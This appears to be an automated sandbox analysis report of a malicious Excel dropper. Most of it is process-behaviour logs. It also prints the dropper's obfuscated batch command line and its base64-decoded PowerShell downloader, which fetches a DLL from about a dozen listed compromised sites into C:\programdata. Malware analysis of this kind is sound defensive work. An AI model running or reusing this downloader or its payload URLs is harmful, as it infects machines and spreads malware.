Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_000007FE8B730F51 sldt word ptr [eax]

5_2_000007FE8B730F51

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 595897	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1839	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8082	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3006
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6864
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7244

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496	Thread sleep count: 1839 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496	Thread sleep count: 8082 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3544	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3564	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548	Thread sleep time: -595897s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548	Thread sleep time: -2400000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720	Thread sleep count: 3006 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3716	Thread sleep count: 6864 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3764	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3764	Thread sleep time: -5400000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3900	Thread sleep count: 2648 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3900	Thread sleep count: 7244 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3968	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940	Thread sleep time: -2400000s >= -30000s

Source: C:\Windows\System32\cmd.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\cmd.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 595897	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000

Source: xxTupY4Fr3.xlsx, xxTupY4Fr3.xls.0.dr, jledshf.bat.0.dr, 13E20000.0.dr

Binary or memory string: dir c:\&echo zdrfsgESTGaw3sryzsdfgzsdertfsjehgfskug3kjshgegZSFHdrHzDSS356tzgd&SET hjhdrdresas=po&echo DGsg4e6ysxdfhzxdfggDHdrthdrx dhDthDghDRtgsd45ydxfh&SET YUderhdD3=wers&echo dgbkw4tdgfTGHJ5rs6dt hse547thxDFXHtgjfxdtrgdfhxdfgf&SET VvdsFHd4=hell -e&echo Has4htksdighfdGJSXDghs4tshdkrg zasg3ksjfHXGHJXdfezse34&SET HJtre4edtgf=nc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8A&echo Fghsdregsh3ksjdfhkgzfHGhjXdgzs4tjsrhdfkjgdkjzkjhk4jdksrjgcvbnw34&SET bsRHYdtsughzsd23zfg=dwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkA&echo HSDr4hklsdifhglsidhg shdk4hystDjGhJGFyYUOf56FUghjcvGFHdrgdr6retydjeh4gjehg&SET cvxerses3srYHDFj=bwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsA&echo rthiuHIUGuiygibgIBIUUYfuyGIGIHIBTYDRTDERWST676tuYGHIGUG65r7GkioOOHuYGFuVCR45rfV&SET fgdsahkaw3DF=JABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: xxTupY4Fr3.xls.0.dr

OLE indicator, VBA stomping: true

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){$Js3hlskdcfk="vbkwk";$sdewHSw3gkjsd=Get-Random;$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;if(test-pAtH $IDrfghsbzkjxd){if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}}}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){$Js3hlskdcfk="vbkwk";$sdewHSw3gkjsd=Get-Random;$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;if(test-pAtH $IDrfghsbzkjxd){if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}}}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){$Js3hlskdcfk="vbkwk";$sdewHSw3gkjsd=Get-Random;$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;if(test-pAtH $IDrfghsbzkjxd){if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}}}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){$Js3hlskdcfk="vbkwk";$sdewHSw3gkjsd=Get-Random;$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;if(test-pAtH $IDrfghsbzkjxd){if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}}}	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){$Js3hlskdcfk="vbkwk";$sdewHSw3gkjsd=Get-Random;$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;if(test-pAtH $IDrfghsbzkjxd){if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}}}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){$Js3hlskdcfk="vbkwk";$sdewHSw3gkjsd=Get-Random;$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe 